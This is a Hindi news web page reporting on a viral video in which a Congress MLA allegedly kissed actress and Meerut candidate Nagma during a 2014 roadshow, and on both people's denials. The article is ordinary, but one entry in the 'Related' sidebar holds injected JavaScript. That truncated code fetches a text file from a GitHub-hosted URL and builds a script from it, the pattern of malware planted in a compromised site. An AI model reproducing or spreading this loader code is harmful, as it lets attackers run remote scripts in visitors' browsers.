नगमा को विधायक का ‘किसÓ करने वाला वीडियो हुआ वायरल

Date:

25_03_2014-25nagma
नई दिल्ली। मेरठ लोकसभा क्षेत्र से कांग्रेस प्रत्याशी और बॉलीवुड अभिनेत्री नगमा को स्थानीय कांग्रेसी विधायक गजराज सिंह द्वारा कथित तौर पर ‘किसÓ करने का मामला अभी पूरी तरह से शांत नहीं हुआ है। भले ही छेडख़ानी की खबरों को नगमा और गजराज दोनों ने खारिज किया है, लेकिन विधायक का नगमा को किस करने वाला वीडियो यू ट्यूब पर वायरल हो गया है। लोग जमकर इस वीडियो को देख रहे हैं।
दरअसल, शनिवार को हापुड़ में रोड शो के दौरान वहां के स्थानीय विधायक गजराज सिंह काफिले के बीच नगमा के पास गए और कथित तौर पर उनके गाल को चूमा। वीडियो में साफ दिखाई दे रहा है कि नगमा ने उनका हाथ जोर से झटक दिया। हालांकि बाद में दोनों ने इस खबर को पूरी तरह से खारिज कर दिया।
विधायक ने कहा कि नगमा उनकी बेटी की तरह हैं और वे उनके साथ ऐसा करने के बारे में सोच भी नहीं सकते हैं। उन्होंने तो बस नगमा के कान के पास जाकर कुछ कहने की कोशिश की थी। उनका कहना है कि लोगों ने पता नहीं इसका गलत मतलब निकाल लिया। वे इस बात से आहत भी नजर आए और कहा कि आज तक उनके चरित्र पर कभी किसी ने कोई उंगली नहीं उठाई है।
इधर, नगमा ने भी इस खबर का खंडन किया है। जबकि इंटरनेट पर दोनों का ये वीडियो खूब देखा जा रहा है और लोग इसे शेयर भी कर रहे हैं। इस वीडियो में साफ दिख रहा है कि जब गजराज नगमा के पास जाते हैं तो नगमा अपने चेहरे पर रखा उनका हाथ झटकती हैं।

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Share post:

Subscribe

spot_imgspot_img

Popular

More like this
Related

oHmtKvYkl

QYRRUUjF;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script...

हिन्दुस्तान जिंक के स्वास्थ्य अभियान के तहत विश्व स्तनपान सप्ताह आयोजित

हिंदुस्तान जिंक, द्वारा स्वास्थ्य अभियान के तहत् विश्व स्तनपान...

हिंदुस्तान जिंक द्वारा खनन कार्यों में आंतरिक प्रतिभा के कौशल एवं अवसर वृद्धि हेतु जावर में ‘हिंदुस्तान जिंक माइनिंग अकादमी’ का शुभारंभ

इस अनूठी पहल से भूमिगत खदानों में जंबो हेल्पर्स प्रमाणित ऑपरेटर बन सकेंगे - पांच महीने तक चलनेवाले इस प्रशिक्षण कार्यक्रम में 16 सप्ताह का क्लासरूम इंस्ट्रक्शन शामिल होगा उदयपुर, 30 जुलाई, 2022: देश की एकमात्र और विश्व...